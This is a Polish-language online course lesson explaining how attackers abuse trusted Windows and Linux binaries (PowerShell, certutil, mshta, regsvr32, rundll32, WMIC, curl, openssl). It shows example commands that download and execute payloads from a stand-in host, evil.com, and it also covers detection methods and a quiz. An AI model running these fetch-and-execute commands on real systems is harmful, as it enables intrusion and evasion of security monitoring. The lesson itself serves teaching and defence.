0Pricing
Cyber Security Academy · Lekcja

Binarne pliki Living-Off-the-Land (LOLBins)

Wykorzysta Pan/Pani zaufane pliki binarne systemu Windows (certutil, mshta, regsvr32) do uniknięcia wykrycia.

Binarne pliki Living-Off-the-Land (LOLBins) to bezpłatna lekcja Cyber Security Academy na CoddyKit. To lekcja 2 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Cyber Security Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Czym są LOLBins?

Living-Off-the-Land Binaries (LOLBins) to legalne pliki binarne i narzędzia systemu operacyjnego, wykorzystywane przez atakujących do wykonywania złośliwych działań. Ponieważ są to zaufane, podpisane narzędzia systemowe, często omijają listy dozwolonych aplikacji i ograniczają wykrywanie przez AV/EDR.

Dlaczego LOLBins są skuteczne

Korzyści dla atakujących:

  • Są zawsze obecne w systemach docelowych — nie ma potrzeby dostarczania nowych plików
  • Są podpisane przez Microsoft/Apple — omijają wykrywanie oparte na sygnaturach
  • Są uznawane za zaufane przez rozwiązania do kontroli aplikacji
  • Tworzą drzewa procesów wyglądające na legalne

PowerShell jako LOLBin

PowerShell jest najczęściej nadużywanym LOLBinem. Atakujący używają:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe to narzędzie systemu Windows do obsługi certyfikatów, które może pobierać pliki:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta i wscript

Wykonywanie skryptów za pośrednictwem zaufanych hostów:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe może ładować i wykonywać biblioteki DLL z odległych adresów URL za pośrednictwem flag /s /n /u /i — omijając AppLocker i uruchamiając niepodpisany kod jako zaufany proces:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

WMIC i wykonywanie za pomocą WMI

Windows Management Instrumentation umożliwia zdalne i lokalne wykonywanie kodu:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe ładuje i wykonuje punkty wejścia bibliotek DLL:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins w systemie Linux

Odpowiedniki w systemie Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS i GTFOBins

Bazy referencyjne:

  • LOLBAS (lolbas-project.github.io) — pliki binarne Windows, skrypty i biblioteki
  • GTFOBins (gtfobins.github.io) — pliki binarne Linux/macOS służące do eksploatacji, odczytu i zapisu plików oraz eskalacji SUID

Wykrywanie nadużywania LOLBinów

Strategie wykrywania:

  • Rejestrowanie bloków skryptów PowerShell (EventID 4104) — rejestruje zdekodowane polecenia
  • Sysmon EventID 1: tworzenie procesu wraz z łańcuchem procesu nadrzędnego
  • Alarmowanie o nieoczekiwanych relacjach nadrzędny–podrzędny: Word → PowerShell, Excel → cmd
  • Połączenia sieciowe nawiązywane przez certutil, mshta i powershell
  • Wartości bazowe UEBA sygnalizujące nietypowe użycie plików binarnych

Szybki test: LOLBins

Który plik binarny systemu Windows może pobrać zdalny plik za pomocą flagi -urlcache?

Podsumowanie lekcji

LOLBins to legalne narzędzia systemu operacyjnego wykorzystywane do złośliwych celów: PowerShell, certutil, mshta, regsvr32, rundll32 i WMIC w systemie Windows oraz curl, python i openssl w systemie Linux. Omijają wykrywanie oparte na sygnaturach i listy dozwolonych aplikacji. Wykrywanie wymaga rejestrowania tworzenia procesów (Sysmon), rejestrowania bloków skryptów PowerShell i baz zachowania. LOLBAS i GTFOBins to niezbędne bazy referencyjne.

Często zadawane pytania

Czy lekcja „Binarne pliki Living-Off-the-Land (LOLBins)” jest bezpłatna?

Tak — pełny tekst „Binarne pliki Living-Off-the-Land (LOLBins)” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Cyber Security Academy, przejdź na CoddyKit PRO. Kurs Cyber Security Academy zawiera 4 lekcji w sumie.

Co nauczysz się w „Binarne pliki Living-Off-the-Land (LOLBins)”?

Wykorzysta Pan/Pani zaufane pliki binarne systemu Windows (certutil, mshta, regsvr32) do uniknięcia wykrycia. Ćwiczysz Cyber Security Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.

Czy potrzebuję doświadczenia, aby zacząć Cyber Security Academy?

Nie wymagamy żadnego doświadczenia. Cyber Security Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 2 z 4.

Ile czasu zajmuje lekcja „Binarne pliki Living-Off-the-Land (LOLBins)”?

Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.

Czy mogę pisać i uruchamiać kod w tej lekcji Cyber Security Academy?

Tak. Każda lekcja Cyber Security Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.

Wszystkie lekcje w tym kursie

  1. Frameworki C2: Cobalt Strike i Sliver
  2. Binarne pliki Living-Off-the-Land (LOLBins)
  3. Techniki poruszania się lateralnego
  4. Pisanie raportów red teamu
← Powrót do Cyber Security Academy